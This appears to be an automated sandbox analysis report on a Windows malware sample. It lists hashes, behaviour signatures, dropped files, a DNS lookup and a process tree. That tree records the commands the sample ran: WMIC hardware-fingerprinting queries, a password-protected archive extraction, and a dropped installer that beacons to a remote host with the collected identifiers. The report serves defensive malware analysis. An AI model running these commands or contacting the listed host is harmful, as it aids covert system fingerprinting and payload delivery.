Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    16/06/2024, 12:48 UTC

General

  • Target

    b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe

  • Size

    406KB

  • MD5

    b396063e909ca4c992a06cdbc2df0cd3

  • SHA1

    258def0a71f12cadab512b9aade17446bced5373

  • SHA256

    be535447f6baedc894f1bbd938733394c8b5ea43c5184e8c1643175e3e78a35a

  • SHA512

    ea940af80aa6897ad54c20b8d55a6b25e7ca4b76fee0064eddb71c39ab287bc083c89598b08bb1e6819441a02994d1f8f805b52db89d9a72bed6250fbfb171f0

  • SSDEEP

    12288:/A0i50GM1/EsSaaizIqHJNQbO4tYGbeNiro6:/AfyGEj7IqHDvEiNX6

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1696
    • C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2688
    • C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2656
    • C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC bios Get Version /FORMAT:textvaluelist.xsl
      2⤵
        PID:2708
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
        2⤵
          PID:2756
        • C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\7za.exe
          7za.exe e -y -p"4b4e0a8e25264cabf48c2fb5a66f7511" [RANDOM_STRING].7z
          2⤵
          • Executes dropped EXE
          PID:2984
        • C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\setupcl.exe
          "C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\setupcl.exe" /initurl http://sub.yorkshatb.com/init/b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118/:uid:? /affid "-" /id "0" /name " " /uniqid b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118 /uuid stance(s) Available. /biosserial /biosversion BOCHS - 1 /csname stance(s) Available.
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:580
          • C:\Windows\SysWOW64\Wbem\wmic.exe
            wmic bios get serialnumber, version
            3⤵
              PID:2948

        Network

        • flag-us
          DNS
          sub.yorkshatb.com
          setupcl.exe
          Remote address:
          8.8.8.8:53
          Request
          sub.yorkshatb.com
          IN A
          Response
        No results found
        • 8.8.8.8:53
          sub.yorkshatb.com
          dns
          setupcl.exe
          63 B
          136 B
          1
          1

          DNS Request

          sub.yorkshatb.com

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\[RANDOM_STRING].7z

          Filesize

          80KB

          MD5

          030704fec8e09f22541695badb27552d

          SHA1

          33dabb64be1a527e20819e516a1257ed3c10461f

          SHA256

          284a9b6e90bd414133fb235c7ada9126790548eb6d1b32f43ceb78df6c6facd6

          SHA512

          04977560a6f8fa1889e0c21afc1b7cfa802bfe221db0084cffabbd4dfffe14c31075cfa3d4618b6bffb6e625b3cb31680b9a2b9646cd1c5078a6405870bd44f6

        • \Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\7za.exe

          Filesize

          574KB

          MD5

          42badc1d2f03a8b1e4875740d3d49336

          SHA1

          cee178da1fb05f99af7a3547093122893bd1eb46

          SHA256

          c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

          SHA512

          6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c

        • \Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\nsExec.dll

          Filesize

          8KB

          MD5

          b8be6632a7dc8136ff01338be40fe701

          SHA1

          043fa16929b2af5ed5c1c59b4035a10cf765fb43

          SHA256

          289786fe13801467653eb2712f47f162d6fd3fc2d844be342282f75fc2b2a085

          SHA512

          403474154ff8500e5aae2b4466c652e5d066af2c55d8f158e6f007492ceb1f3abcc6cca80842b90900db02db4258ddcda75dec1d1799af24969c35811891e5b8

        • \Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\setupcl.exe

          Filesize

          193KB

          MD5

          10bd2af1b07ec6bc9cd17ba512569e59

          SHA1

          807e17ab1b98177e135d30941b45081960d1e866

          SHA256

          9c620ef6eac3d0d9d3f6f2622a53d1f543cebd93846636ba397683962c07fc7c

          SHA512

          deacd041f12b6ec74f9e4488874ce962037990ed0ae424aaeabf2c35876b2ebbb943f92e9a4ffe504718bb00021209b035439ea4d7c64a4031b86ce9104ce3ed

        • memory/1696-41-0x0000000000400000-0x0000000000437000-memory.dmp

          Filesize

          220KB

        We care about your privacy.

        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.